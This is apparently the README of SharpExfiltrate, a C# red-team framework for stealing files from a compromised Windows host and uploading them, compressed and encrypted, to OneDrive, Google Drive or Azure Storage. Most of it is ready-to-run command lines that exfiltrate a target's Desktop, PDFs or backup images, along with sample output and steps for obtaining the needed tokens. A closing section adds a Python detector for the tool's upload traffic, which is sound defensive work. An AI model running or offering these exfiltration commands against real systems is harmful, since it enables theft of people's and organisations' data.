
Repository Details

Modular C# framework to exfiltrate loot over secure and trusted channels.

SharpExfiltrate

SharpExfiltrate is a tiny but modular C# framework to exfiltrate loot over secure and trusted channels. It supports both single files and full directory paths (recursively), file extension filtering, and file size filtering. Exfiltrated data is compressed and encrypted before being uploaded. Exfiltrating a large amount of data requires the output stream to be cached on disk, while smaller exfiltration operations can be done entirely in memory with the "memoryonly" option.

Usage

.\SharpExfiltrate.exe OneDrive --username <redacted> --password "<redacted>" --filepath "C:\Users\<redacted>\Downloads\balenaEtcher-Setup-1.5.120.exe"

  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

[+] Compressing C:\Users\<redacted>\Downloads\balenaEtcher-Setup-1.5.120.exe 140,8MB
[+] Password for Zip file is be4886d6a9004ed
[+] Launching OneDrive module by @Flangvik
[+] Performing Authentication using provided credentials
[+] Confirming access to https://graph.windows.net
[+] Starting OneDrive upload
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (7%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (14%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (28%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (35%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (64%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (71%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (85%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (99%)
[+] Upload completed, file located: https://<redacted>-my.sharepoint.com/personal/<redacted>/Documents/DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip

Upload the entire target's Desktop folder, including files and subfolders, using the OneDrive module.

.\SharpExfiltrate.exe OneDrive --username [email protected] --password "Passw0rd123!" --filepath "C:\Users\<user>\Desktop"

Upload all PDFs from all subfolders in the target's root directory, compressing them all in memory, using the GoogleDrive module.

.\SharpExfiltrate.exe GoogleDrive --appname SuperLegitApp --accesstoken "<access-token-string>" --filepath "C:\Users\<user>\" --extensions "pdf;" --memoryonly

Upload all files from all subfolders that are smaller than 1 MB in the target's root directory, using the OneDrive module.

.\SharpExfiltrate.exe OneDrive --username [email protected] --password "Passw0rd123!" --filepath "C:\Users\<user>\" --size 1

Upload a huge ISO image using the OneDrive module.

.\SharpExfiltrate.exe OneDrive --username [email protected] --password "Passw0rd123!" --filepath "C:\Users\<user>\Backup\2021_09_09_Win10Image.iso"

Upload all backup images that are less than 500 MB, using the Azure Storage Account module.

.\SharpExfiltrate.exe AzureStorage --connectionstring <connection-string> --filepath "C:\Users\<user>\Backup\Images" --extensions "vmdk;vmx;iso;ovf;ova;flp" --size 500

Modules

Each module within SharpExfiltrate is accessed by giving the module name as the first (verb) argument:

.\SharpExfiltrate.exe 
  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  OneDrive        Exfiltrate information using the OneDrive module

  GoogleDrive     Exfiltrate information using the GoogleDrive module

  AzureStorage    Exfiltrate information using the Azure Storage Account module

  help            Display more information on a specific command.

  version         Display version information.

OneDrive

The OneDrive module uses a username and password to fetch an access token against the Graph API (OneDrive). Note that testing has only been done on Office365 business accounts (tenant joined). MFA needs to be disabled for the OAuth flow to work.

.\SharpExfiltrate.exe OneDrive
  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  -u, --username      Required. Username (email) for the OneDrive account to store exfiltrated data

  -p, --password      Required. Password for the OneDrive account to store exfiltrated data

  -f, --filepath      Required. Path to file or directory to be exfiltrated

  -e, --extensions    Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)

  -s, --size          Max filesize in MB, all files above this number will be ignored from exfiltration.

  -m, --memoryonly    Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)

  --help              Display this help screen.

  --version           Display version information.

GoogleDrive

The GoogleDrive module uses an access token that can be generated at https://developers.google.com/oauthplayground/. Scroll down until you find "Drive API v3" on the left-hand side. Click it and select https://www.googleapis.com/auth/drive.file, then go down and click "Authorize APIs", accept, and follow the login steps. You should then be taken to a page where you generate and copy out your access token. Keep in mind that the access token expires after 3600 seconds.

.\SharpExfiltrate.exe GoogleDrive

  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  -n, --appname        Required. GoogleDrive Application name (Can be anything)

  -t, --accesstoken    Required. Valid access token onbehalf of your GoogleDrive account

  -f, --filepath       Required. Path to file or directory to be exfiltrated

  -e, --extensions     Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)

  -s, --size           Max filesize in MB, all files above this number will be ignored from exfiltration.

  -m, --memoryonly     Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)

  --help               Display this help screen.

  --version            Display version information.

Azure Storage Account

The Azure Storage Account module uses a connection string to create a subfolder (container) called "loot", to which it uploads the exfiltrated data. This requires a Storage Account to be created in Azure; the connection string can be found under "Access keys" in your Storage Account submenu.

.\SharpExfiltrate.exe AzureStorage

  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  -c, --connectionstring    Required. Connection string to your Azure Storage Account

  -f, --filepath            Required. Path to file or directory to be exfiltrated

  -e, --extensions          Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)

  -s, --size                Max filesize in MB, all files above this number will be ignored from exfiltration.

  -m, --memoryonly          Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)

  --help                    Display this help screen.

  --version                 Display version information.

Detection / Defense

See the included yara rule :)
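The included YARA rule is not reproduced on this page. As an added, defender-side example (not part of the project), the Python below flags upload log entries whose archive name follows the <machine>_<YYYYMMDD>T<HHMM>UTC_<name>.zip convention visible in the sample output above; that naming pattern is inferred from the output, the destination host suffixes are an assumption, and the log lines are constructed.

```python
import re
from typing import Dict, List, Optional

# Archive name convention inferred from the README's sample output, e.g.
# DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip
# -> <machine>_<YYYYMMDD>T<HHMM>UTC_<original name>.zip (assumption, not from project source)
ARTIFACT_RE = re.compile(
    r"^(?P<machine>[A-Za-z0-9-]+)_(?P<date>\d{8})T(?P<time>\d{4})UTC_(?P<orig>.+)\.zip$"
)

# Upload destinations of the three modules on this page: OneDrive (SharePoint),
# Google Drive API and Azure Blob Storage. Suffix match; this list is an assumption.
CLOUD_SUFFIXES = ("-my.sharepoint.com", "www.googleapis.com", ".blob.core.windows.net")

def parse_artifact(name: str) -> Optional[Dict[str, str]]:
    """Return the parts of a SharpExfiltrate-style archive name, or None if no match."""
    m = ARTIFACT_RE.match(name)
    return m.groupdict() if m else None

def flag_uploads(log_lines: List[str]) -> List[Dict[str, str]]:
    """Scan proxy-style lines '<client> <method> <url>' and return suspicious uploads:
    PUT/POST to a cloud suffix where the last URL segment matches the convention.
    Google Drive puts the filename in the request body, so only its host is visible here."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # malformed line, skip
        client, method, url = parts[0], parts[1].upper(), parts[2]
        if method not in ("PUT", "POST"):
            continue
        host = url.split("://", 1)[-1].split("/", 1)[0]
        if not host.endswith(CLOUD_SUFFIXES):
            continue
        info = parse_artifact(url.rstrip("/").rsplit("/", 1)[-1])
        if info:
            hits.append({"client": client, "dest": host, **info})
    return hits

# Constructed sample log lines (not real traffic); tenant and account names are placeholders.
SAMPLE_LOG = [
    "10.0.0.5 PUT https://contoso-my.sharepoint.com/personal/u/Documents/DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip",
    "10.0.0.5 GET https://contoso-my.sharepoint.com/personal/u/Documents/report.docx",
    "10.0.0.9 PUT https://stacct.blob.core.windows.net/loot/WS01_20210911T1305UTC_Backup.zip",
    "10.0.0.9 POST https://www.googleapis.com/upload/drive/v3/files",
]

if __name__ == "__main__":
    for hit in flag_uploads(SAMPLE_LOG):
        print(hit)
```

The GET to SharePoint and the Google Drive POST are not flagged, which shows the limit of URL-only matching: for the Google Drive module, pair this with the filename from the request body or with the YARA rule on the host.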

Credits
